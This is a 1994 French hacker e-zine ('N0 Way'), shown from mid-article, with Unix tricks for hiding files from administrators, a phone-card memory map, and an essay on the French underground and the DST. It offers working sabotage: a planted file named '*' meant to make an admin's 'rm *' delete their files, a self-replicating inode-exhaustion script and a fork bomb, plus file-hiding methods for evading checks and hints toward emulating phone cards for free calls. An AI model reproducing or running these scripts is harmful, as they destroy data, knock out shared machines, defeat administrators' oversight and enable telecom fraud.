- -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
- -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
- -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
- drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- [voici nos fichiers]
- DaubeNet-fred {102} ll milnet.dialup root.axs
- 1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- 2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
- [On crée le directory fantome]
- DaubeNet-fred {103} mkdir ".. "
- [On met nos fichiers dedans]
- DaubeNet-fred {104} mv milnet.dialup root.axs ".. "
- [OOOooOOoOoOps, ca fait drole quand meme deux directory ".." !!!]
- DaubeNet-fred {105} ls -al
- total 44
- drwx------ 13 fred emprunte 512 Sep 15 02:25 .
- drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
- drwx------ 2 fred emprunte 512 Sep 15 02:25 ..
- -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
- -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
- -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
- -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
- -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
- -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
- -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
- -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
- -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- DaubeNet-fred {106} cd ".. "
- DaubeNet-fred {107} ls -al
- total 5
- drwx------ 2 fred emprunte 512 Sep 15 02:25 .
- drwx------ 13 fred emprunte 512 Sep 15 02:25 ..
- -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
- DaubeNet-fred {108} cd ..
- DaubeNet-fred {109} mv ".. \milnet.dialup" .
- DaubeNet-fred {110} ls -al
- total 45
- drwx------ 13 fred emprunte 512 Sep 15 02:26 .
- drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
- drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
- -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
- -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
- -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
- -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
- -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
- -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
- -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
- -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
- -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- DaubeNet-fred {111} mv ".. /milnet.dialup" .
- DaubeNet-fred {112} ls -al
- total 47
- drwx------ 13 fred emprunte 512 Sep 15 02:26 .
- drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
- drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
- -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
- -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
- -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
- -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
- -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
- -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
- -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
- -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
- -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
- drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- [Alors pour pas faire trop louche, on va creer un directory pour un utilitaire
- bien obscure et qui semble utile à l'admin. Pour le trouver, reflechissez un
- peu et pas la peine de mettre ".Xnewsrc " si votre systeme n'a pas les news ;]
- DaubeNet-fred {113} mkdir ".Xnewsrc "
- DaubeNet-fred {114} mv root.axs milnet.dialup ".Xnewsrc "
- DaubeNet-fred {115} cd ".Xnewsrc "
- DaubeNet-fred {116} ls
- milnet.dialup root.axs
- DaubeNet-fred {117} ll
- total 3
- 1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- 2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
- DaubeNet-fred {118} ls -al
- total 5
- drwx------ 2 fred emprunte 512 Sep 15 02:27 .
- drwx------ 14 fred emprunte 512 Sep 15 02:27 ..
- -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
- -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
- DaubeNet-fred {119} cd ..
- DaubeNet-fred {120} ll
- total 43
- 1 drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
- 1 -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
- 1 drwx------ 2 fred emprunte 512 Sep 15 02:27 .Xnewsrc
- 9 -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
- 1 -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
- 1 drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
- 3 -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
- 1 -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
- 1 -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
- 1 -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
- 8 -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
- 1 -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
- 1 drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- 1 drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- 1 drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- 1 drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- [ c'est discret et ca apparait pas sans l'option "-a" de "ls"]
- DaubeNet-fred {121} ls -l
- total 12
- drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- DaubeNet-fred {122} rm -fr ".Xnewsrc "
- DaubeNet-fred {123} ls -al
- total 44
- drwx------ 13 fred emprunte 512 Sep 15 02:27 .
- drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
- drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
- -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
- -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
- -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
- -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
- -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
- -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
- -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
- -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
- -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
- drwx------ 7 fred emprunte 512 Jun 20 01:40 src
- drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
- drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
- DaubeNet-fred {124} exit
-
- ======> Script done on Thu Sep 15 02:28:05 1994
-
- Interressant n'est ce pas?
-
- Comme ca on peut planquer des trucs sympa meme si il y a un petit "d" au tout
- debut de l'affichage, on peut quand meme les cacher la dedans car en général
- les admins sont trop flemmards pour aller fouiller la dedans.
- Le nombre d'espace a la fin du fichier peut varier, un seul espace c'est tout
- de suite ce que l'on teste, mais si vous en mettez 42, c'est beaucoup moins
- évident.
-
- L'intéret de créer des fichier commencant par "." est qu'ils ne sont pas listés
- à moins qu'on donne l'option "-a" a la commande "ls".
-
- Vous pouvez aussi inclure des caracteres de controles dans le nom de vos
- fichier comme ^X ou ^T mais je déconseille car ca attire plutot l'attention.
-
- Comment je planque mes images?
- =============================
-
- Dans certaines ecoles, il y a des règles pas si conne que ca qui
- interdisent les images sur leur réseau et donc des moulinettes tournent tous
- les jours pour traquer les .gif, .jpg etc...
-
- Pour eviter de vous les faire detruire, vous pouvez les cacher dans des
- fichiers TAR.
- exemple:
- ======> Script started on Thu Sep 15 02:49:50 1994
-
- DaubeNet-tmp {101} ls -al
- total 778
- drwx------ 2 fred emprunte 512 Sep 15 02:49 .
- drwx------ 13 fred emprunte 512 Sep 15 02:27 ..
- -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
- -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
- DaubeNet-tmp {102} tar cvf projet-math.tar hardfuck.gif susan.gif
- hardfuck.gif
- susan.gif
- tar: tar vol 1, 2 files, 0 bytes read, 788480 bytes written.
- DaubeNet-tmp {103} ll
- total 1560
- 552 -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif
- 784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
- 224 -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif
- DaubeNet-tmp {106} rm hardfuck.gif
- DaubeNet-tmp {107} rm susan.gif
- DaubeNet-tmp {108} ll
- total 784
- 784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar
- DaubeNet-tmp {109} compress projet-math.tar
- DaubeNet-tmp {110} ll
- total 5
- 5 -rw------- 1 fred emprunte 4169 Sep 15 02:50 projet-math.tar.Z
- DaubeNet-tmp {111} exit
-
- ======> Script done on Thu Sep 15 02:51:17 1994
-
- Si le programme de l'admin est assez vicieux pour checker l'interieur des
- fichiers compresses et de le detarer ensuite, vous n'avez qu'a faire cela et
- ensuite UUENCODER votre "projet-math.tar.Z" en un "projet-math.dat" ainsi tout
- le monde (y compris le programme) pensera que c'est un fichier donnée.
-
- Crypter ses fichiers:
- ====================
- Sous unix, il y a un petit utilitaire bien piegeur qui s'appelle crypt.
- Attention, si votre Admin n'est pas trop con, il aura un petit outil appelé
- gentiment CBW pour Crypt Breaker Workbench qui lui permettra de casser le code
- de crypt. Je vous déconseille donc d'utiliser crypt.
- (PS: cbw peut vous être utile, il est disponible en ftp anonymous un peu
- partout sur l'internet sous le nom: cbw.tar.Z).
-
- Par contre, un package genial c'est PGP: un produit qui permet
- d'ampliquer assez simplement le cryptage RSA (ou plutot IDEA) qui semble t'il
- est une combinaison de DES et de RSA.
-
- C'est vraiment un outil génial qui vaudrait un article de N0 Way a lui tout
- seul.
-
- Faire criser son admin:
- ======================
- Vous savez certainnement que sous Unix, certains caracteres sont
- interpretés par le Shell avant d'executer la commande dans laquelle était le
- fameux caractere.
- Ce caractere c'est par exemple "*" qui va être remplacé par les noms de tous
- les fichiers du directory en question.
- Amusez vous a créer dans un directory hyper important de votre admin un fichier
- nommé "*".
-
- Exemple:
-
- ======> Script started on Thu Sep 15 03:11:09 1994
-
- DaubeNet-/home/root {101} ls -al
- total 778
- drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
- drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
- -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
- -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
- DaubeNet-/home/root {102} cat >\*
- ^D
- DaubeNet-/home/root {103} ll
- total 776
- 0 -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
- 552 -rw-r-xr-x 1 root wheel 557056 Sep 15 02:49 important.txt
- 224 -rw-r-xr-x 1 root wheel 221184 Sep 15 02:48 whole-sources.c
- DaubeNet-/home/root {104} exit
-
- ======> Script done on Thu Sep 15 03:11:40 1994
-
- L'admin (assez con pour laisser son directory en lecture / ecriture) a une
- jolie bombe a retardement qu'il va s'empresser d'allumer des qu'il se loggera.
-
- ======> Script started on Thu Sep 15 03:18:54 1994
-
- DaubeNet-/home/root {101} ls -al
- total 778
- -rw-r-xr-x 1 fred emprunte 0 Sep 15 03:11 *
- drwxrwxrwx 2 root wheel 512 Sep 15 03:11 .
- drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
- -rw------- 1 root wheel 557056 Sep 15 02:49 important.txt
- -rw------- 1 root wheel 221184 Sep 15 02:48 whole-sources.c
- DaubeNet-/home/root {102} rm *
- DaubeNet-/home/root {103} ll
- DaubeNet-/home/root {104} ls -al
- total 2
- drwxrwxrwx 2 root wheel 512 Sep 15 03:19 .
- drwxr-xr-x 13 root wheel 512 Sep 15 02:27 ..
- DaubeNet-/home/root {105} echo Arghhhhh
- Arghhhhh
- DaubeNet-/home/root {106} exit
-
- ======> Script done on Thu Sep 15 03:19:21 1994
-
- VOila, c'est fini pour la partie locale...
- Maintenant, je vais vous expliquer comment vous servir des répertoires
- incomings et autres pour vous transferer des fichier.
-
- Le FTP anonyme:
- ==============
- Sur FTP Anonyme, vous avez souvent un directory "/incoming" qui vous permet de
- déposer des fichiers pour l'admin.
- Un site bien configuré aura mis comme mode pour ce dir: rwxrwxr-t qui veut
- dire: rwx : lecture/ecriture/traversee possible pour l'owner
- rwx : meme chose pour le groupe
- -wt : acces en ecriture avec traversée du directory possible mais sans
- possibilité d'effacer le fichier d'un autre.
-
- Un site mal configuré aura pour mode: rwxrwxrwx qui veut dire:
- lecture, ecriture et traversée pour tout le monde.
- Donc vous pourrez vous créer par un
- ftp> mkdir ".. "
- un fichier secret et ensuite déposer les dernieres versions d'Excel ou le
- dernier N0 Way pour vos amis qui viendront les recuperer plus tard et les
- effacer!
-
- Interressant n'est ce pas? Ainsi, hop, vous pouvez faire transiter anonymement
- des trucs sur Internet.
-
- I-node muncher:
- ==============
- Un admin vous a vraiment fait une crasse? Vous êtes vert et vous
- voulez un peu le faire chier...
- un "rm -fr /" ? C'est vraiment con car ca peut causer de sales problèmes à des
- personnes qui n'ont rien fait.
- Ce qui est mieux c'est de faire un peu chier l'admin en lui bouffant tous ses
- Inodes. Un inode c'est le numéro qui désigne un fichier dans le filesystem
- unix donc si vous les prenez tous, personne ne pourra plus creer de fichier
- même si il reste plein de place sur le disque.
- Alors voila le shell script nw.sh:
- $ cat >nw.sh <<EOF
- #!/bin/csh
- umask 000
- mkdir N0way
- cp nw.sh N0way
- cd N0way
- chmod +x nw.sh
- ./nw.sh &
- EOF
- $
-
- Executez ce fichier et *kaboummm* le système va commencer à sérieusement merder
- hehehehehe...
- Vous pouvez même en lancer plusieurs.
-
- Task muncher:
- ============
- Vous pouvez faire la même chose avec les processus si les quotas ne
- tournent pas. En faisant tourner un seul process qui a chaque fois forke 5
- fois et vous verrez que plus la machine va vite, plus votre programme investira
- rapidement l'ordinateur en question.
- $ cat >dontkill.sh <<EOF
- #!/bin/csh
- ./dontkill.sh &
- ./dontkill.sh &
- ./dontkill.sh &
- ./dontkill.sh &
- ./dontkill.sh &
- EOF
- $
-
- Voila, c'est le fion. Euh... la fin.
- J'espere que ce ++N-Phile vous aura été bien utile et occupera longtemps votre
- admin. N'oubliez pas une chose,
- IL EXISTE QUAND MEME DES ADMINS COOLS ALORS, laissez ceux la tranquile. :))
-
- The End.
-
-
-
-
-
- C'est fini.... y a rien en dessous...
-
-
-
-
- STOP !!!! YA PLUS RIEN.
- <EOF>
-
-
- Non mais c'est dingue, Vous etes sourd ou quoi, je vous repete que c'est FINI!
- :)
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.8
-
-
- Voila, Neuralien m'a presse pour écrire ce petit texte veuillez ne pas tenir
- compte des fotes d'orthographes et autre stupiditées du meme genre.
- [Bahh... fo tout le temps presser tout le monde. On me le fait bien hehe:
- "NeurAlien, depeche toi, c'est quand qu'il sort N0 Way 4?
- - Euh... bin attend mon pote, on a pas encore sorti le 3!!! :)" ++N]
-
-
- CARTES TELEPHONIQUES
- 1/2
- Pour NOWAY
- PAR D. O'CONNELL
-
- Depuis "l'invention" par le fumeux Roland Moreno en 1975 de la carte à puce
- les applications se sont multipliées. La plus connue étant celle des
- téléphones à cartes, on va donc étudier le mode de fonctionnement de ces
- cartes dans le but évident d'en ameliorer le fonctionnement..
-
- La realisation technique de la carte tient plus du bricolo que de l'invention
- géniale, le seul (et grand) mérite de Moreno a été d'être un visionaire
- génial.
- On peut résumer le fonctionnement de la carte à une eprom à acces serie donc à
- priori rien de bien compliqué, nostélécartes francaises comportent une simple
- mémoire de 256 bits, oui vous avez bien lu 32 octets!
-
- La carte est séparée en deux zones la premiere de 96 bits ets dites "Zone
- constructeur" la deuxieme etant la "zone de transaction", jusque là tout le
- mond suit ? pas de probléme?
- Les deux zones sont en acces libre pour la lecture, vous pouvez donc voir ce
- qui y est écrit sans probleme. La zone transaction peut etre ecrite, mais on
- ne peut écrire que des 0 (technologie des eproms) ce qui revient à débiter des
- unitées, meme Regis c'est rendu compte que c'était pas vraiement interessant.
- La zone constructeur est elle protegée par un fusible qui grille apres la
- premiere programmation, donc on peut plus écrire meme des 0. OK ca va??
-
- Voila la map memory d'une carte téléphonique:
-
- Bytes Bits Binary Hexa
-
- +-----------+-----+
- 1 1 --> 8 | | | ---> Code personnalisé.
- +-----------+-----+
- 2 9 --> 16 | 0000 0011 | $03 | ---> Télécarte
- +-----------+-----+
- 3 17 --> 24 | | |
- +-----------+-----+
- 4 25 --> 32 | | |
- +-----------+-----+
- 5 33 --> 40 | | |
- +-----------+-----+
- 6 41 --> 48 | | |
- +-----------+-----+
- 7 49 --> 56 | | |
- +-----------+-----+
- 8 57 --> 64 | | |
- +-----------+-----+
- 9 65 --> 72 | | |
- +-----------+-----+
- 10 73 --> 80 | | |
- +-----------+-----+
- 11 81 --> 88 | 0001 0000 | $10 |
- +-----------+-----+
- 12 89 --> 96 | 0001 0011 | $13 | ---> 120 unités
- | 0000 0110 | $06 | ---> 50 unités
- | 0000 0101 | $05 | ---> 40 unités (plus utilisé)
- +-----------+-----+
- 13-31 97 --> 248 | | | ---> Zone de transaction ou chaque
- | | | bit represente une unité
- | | |
- | | |
- | | |
- | | |
- | | |
- +-----------+-----+
- 32 249 --> 256 | 1111 1111 | $FF | ---> Carte vide
- +-----------+-----+
-
- En voila assez pour la partie logicielle, on va voir comment on peu acceder
- aux données.
-
-
-
-
- Afnor (Franco-Francais) ISO (Internatinnal)
- En haut à gauche Milieu Gauche
- (abandonné de puis peu)
-
- -------------+------------- -------------+-------------
- | 8 | 4 | | 1 | 5 |
- | | | | | |
- +-------\ | /-------+ +-------\ | /-------+
- | 7 +----+----+ 3 | | 2 +----+ + 6 |
- | | | | | | | |
- +--------| |--------+ +--------| |--------+
- | 6 | | 2 | | 3 | | 7 |
- | + +----+ | | +----+----+ |
- +-------/ | \-------+ +-------/ | \-------+
- | 5 | 1 | | 4 | 8 |
- | | | | | |
- -------------+------------- -------------+-------------
-
-
- PINOUT: 1 : Vcc = 5V 5 : Gnd (0V)
- 2 : R/W(Lire='1':Ecrire='0')6 : Vpp = 21V (Tension de prog)
- 3 : Clock (Horloge) 7 : I/O (Entrée/Sortie)
- 4 : Reset 8 : Fusible
-
-
- - Time diagrams:
-
- +21V _____________
- +5V____________________________________| |_________________ Vpp
- : :
- +5V ___________________:_____________:_________________ Reset
- 0V ________________| : :
- : : :
- +5V ____ : ____ : ______:______
- 0V ___| |_______:_____| |________:______| : |__________ Clock
- : : : : : : : : :
- +5V : : : : : :______:______: : _
- 0V ___:____:_______:_____:____:________| : |______:__________ R/W
- : : : : : : : : :
- +5V : : :_____: :________: : : :__________
- 0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
- : : : : : :<-----><---->: :
- : : : : : :10 to 10 to :
- : : : : : :50 ms 50ms :
- Reset Bit 1 Bit2 Ecriture Bit 3
-
-
- Vous avez donc tous les éléments en main pour comprendre le fonctionnement de
- la carte, dans un prochain numéro, il y aura un lecteur/ecriveur de carte et
- peut etre un "Simulateur de carte téléphonique reprogrammable à volonté".
-
- Pour répondre à vos questions voici l'extrait d'un petit dialogue qui a eu
- lieu il y a deja quelque temps chez FB apres un détour au bar Le Terminus:
-
- Si on peut ecrire sur la carte c'est super on peut rajouter des unités!
- ARGHH! On peut écrire que des zeros donc déduire des unités!
-
- Comment on fait pour ecrire des '1'?
- Il faut effacer l'eprom aux UV
-
- Ben on fait ca ! non?
- Ben la resine qu'il y a sur puce est anti UV
-
- On enlève la résine!
- En admettant que tu puisses enlever la resine sans endommager le chip, tu
- efface TOUT y compris la zone constructeur, que tu ne peux reécrire puisque
- le fusible a été grillé!!!!
-
- On remet le fusible!
- Bien sur avec tes petits doigts habiles tu recable une connextion de 5 µm
- ca y ait MD tu as trouvé le system :-(
-
- Le moyen n'est pas là, il faut faire croire à la cabine qu'elle est en
- presence d'une vraie carte... Que pensez vous d'une RAM avec quelques compos
- logique autours??? Voila a vous de vous débrouiller j'ai donné l'idée générale
- il ne vous manque plus que la réalisation! Rendez vous dans le prochain
- numéro......
- [Addendum de chieur de service, je me suis nommé NeurAlien, vous avez remarque
- que l'on est repassé du système de tambour (vous savez: inserez la carte et
- rabatez le couvercle) à un système normal sans tambour. Bien sur, le tambour
- servait à éviter que les trains de cables puissent etre faits. Alors ya des
- Ueber-Phreakers qui ont fait des fausses cartes avec des composants en CMS.
- Et donc comme tout tenait sur une carte, FT=baisé car plus de train de cables.
- Donc eux aussi ont rusé: Ils ont un système genre reflectomètre qui si au lieu
- d'etre en contact direct avec la carte, il y a quelques centimetre de cable qui
- les menes jusqu'aux contacts normaux d'une vraie carte: ca foire, la carte est
- rejetée! Alors je sais pas comment ils ont fait ca mais en tout cas c'est
- assez chaud. hehe, je suis pas électronicien mais on m'a dit que ca se faisait
- facilement. ++NeurAlien]
-
- Merci à Marc d'avoir passe quelques heures dans certains fichiers de config, à
- EFZ TEAM de faire vivre ce zine, et à XXXXX pour mon defunt acces INET.
- [je protège les innocents, pas de pseudos connus et identifiables ds N0 WAY]
- D. O'CONNELL A.K.A. HOPPY
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.9
-
-
- Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
- diffuse publiquement.
- PS: ca date, maintenant l'underground informatique est bien développé mais non
- encore interconnecté.
-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- = CORE-DUMP | Volume I | Issue 2 | Phile 6 | [NeurAlien] 12/09/92 =
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- ._ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ .
- /_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /|
- :_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_: |
- :_: Pourquoi :_: |
- :_: L'Underground Informatique:_: |
- :_: est-il :_: |
- :_: sous développé? :_: |
- :_: en France :_: |
- :_:_ _ _ _ _ _ _ _ _ _ _ _ _ _:_: |
- :_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:/'
-
- Par NeurAlien
-
-
- J'ai choisi de faire cet article sur la vie de l'Underground
- Informatique Francais après avoir réfléchi au fait qu'il se créait parfois
- dans des endroits très reculés et très peu ouverts du réseau, des petites
- "iles" où un petit groupe de hackers ou de phone phreaks se rencontrent, mais
- que jamais il n'y a eu d'underground organisé et qui dure dans le temps
- comparable à ceux formés aux USA ou en Allemagne.
-
- >Qu'est-ce que l'Underground:
- ============================
- Le concept d'underground informatique est venu en premier avec le
- Chaos Computers Club de Hambourg qui a fait beaucoup de réflexions poussées
- sur les hackers et les phone phreaks.
- En fait, l'Underground n'est ni un serveur, ni un journal, ni un groupe
- comme les LODs ou le CCCH. L'Underground est un ensemble de relations et
- d'histoires qui se répètent et se perpétuent à travers des discussions et
- des journaux pour H/P et ainsi, cela forme un petit "monde" totalement
- virtuel avec ses propres règles jamais écrites mais respectées comme
- "Ne jamais effacer de donnée sur un système d'information a part pour
- couvrir sa trace". (cf: article 4 du Phrack 22 par The Mentor)
- Aux USA, un vaste Underground H/P existe;formé de Phracks Inc, de Computer
- Underground Digest, de différents groupes qui ont toujours étés liés d'une
- manière quelconque. Il y a toujours eu un contact entre les anciens "mate"
- (les meilleurs) qui se sont fait prendre ou qui se sont retirés et les
- jeunes hackers et phone phreaks qui arrivaient dans l'Underground.
- Il y a toujours eu un souci de continuité de la part de l'Underground aux
- USA: les anciens forment des nouveaux avant de s'en aller.
- Mais pour la France? On pourrait presque dire qu'il n'y a jamais
- eu d'ancien.
-
- >Le problème de l'underground Francais:
- ======================================
- L'Underground Francais n'a en fait jamais existé en tant que monde
- durable. De multiples petits "ilots" comme NICK au sein de MCOM, les
- hackers de RIBOUREL, Les SLANS sur VMF/MOP, TeKila's Underground dans
- le club TELECOMS sur RTEL ou encore "le royaume télématique" sur la section
- 'PROBLEMES DE LIAISON SPECIALISE' du serveur de la DTRN ainsi que PIRATEL
- sur un serveur gratuit videotext.
- Tous ces micro-underground n'ont duré que quelques mois tout au plus.
- Bien sûr, vous me direz qu'il existe bien des serveur comme AATEL et PIRATE
- sur le réseau x25. Mais leur plus grand problème est le maillage organisé
- et méthodique que la DST a tissé sur les réseaux Francais.
- Qu'est ce que la DST. C'est la Direction de la Surveillance du
- Territoire dont une grande partie très bien équipée et très bien organisée
- s'occupe du piratage informatique.
- Grâce à leur "réseau" d'informateur et de surveillance, ils sont capables de
- détecter certaines activités tendancieuses sur le réseau Télétel, X25,
- ou même RTC. (l'Internet est très mal maitrisé!! héhéhé !)
- Je vais vous raconter une anecdote qui illustre bien l'étendue de leur
- pouvoir. Suite au piratage d'une grande boite d'informatique de France, un
- groupe de hacker a été "tracké" par la DST. Dans ce groupe, il y avait un
- certain "DIEU" (le pseudonyme), tristement célèbre par son irrespect envers
- tous les autres hackers. Ce dernier était recherché activement et pourtant,
- personne de la DST n'arrivait à le prendre.
- Un jour, un connecté sur un petit micro-serveur RTC pris pour deconner le
- pseudo DIEU. Quelques jours plus tard, deux inspecteur débarquaient à la
- maison du SYSOP de ce micro-serveur pour savoir qui était ce fameux DIEU.
- Manque de pot pour la DST, ce DIEU en question n'était absolument pas le
- bon!
- (information supplémentaire: le vrai DIEU, le hacker, a quand même été
- retrouvé au bout de 3 ou 4 mois d'enquêtes intensives.)
- La DST a des relations partout et est réputée pour tous savoir.
- Connaissez vous 1984 de George Orwell???? Vous connaissez alors BIG BROTHER.
- La DST, c'est un peu ça mais en moins fort... Néanmoins, vous pouvez être
- sur que s'ils veulent savoir quelque chose, il seront au courant, à quelque
- prix que cela leur coute... Ce sont avec les RG (renseignements généraux) les
- oreilles de l'état; à part que pour la DST, il y a eu des BRAS de rajoutés...
- Quand au "cerveaux", ils ne semblent pas être à la traine dans cet outils
- du pouvoir.
- On comprends donc mieux pourquoi les hackers sont vite arrêtés s'il
- y a pleinte de portée.
- Dès le début, lors d'une affaire de piratage informatique, c'est la DST qui
- s'en occupe plus que la PJ! La DST fait alors un travail méthodique et
- complet d'audit pour traquer le hacker. Le hacker ensuite recoit une visite
- qui termine en général l'enquête sur le hacker. Là, les inspecteurs de la
- DST font "cracher" tout ce dont ils ont besoin au hacker.
- Un micro lors de l'interrogatoire est sans aucun doute possible installé.
- Bien sur, les V (petit surnom pour la DST) ne se limitent pas à des questions
- uniquement sur l'enquête en cours... Ils essayent d'avoir toutes les infos
- possibles sur les autres hackers pour que cela leur facilite la tache s'ils
- doivent trouver d'autre hackers.
- Le matériel du hacker est ensuite saisi, et hop, ils disparaissent de votre
- vie, sans aucune autre trace qu'un grand manque au niveau matériel et une
- lourde menace si jamais on s'avisait de recommencer.
- Le conseil nous est aussi donné de ne pas remettre les pieds sur un serveur
- avant deux mois au moins.
- Apres la partie de la DST, si l'affaire à quelque chose à voir avec une
- fraude ou un quelconque gain d'argent, alors vous pouvez être sûr d'avoir
- une visite de la part de la PJ qui ont des méthodes beaucoup moins calmes
- que la DST.
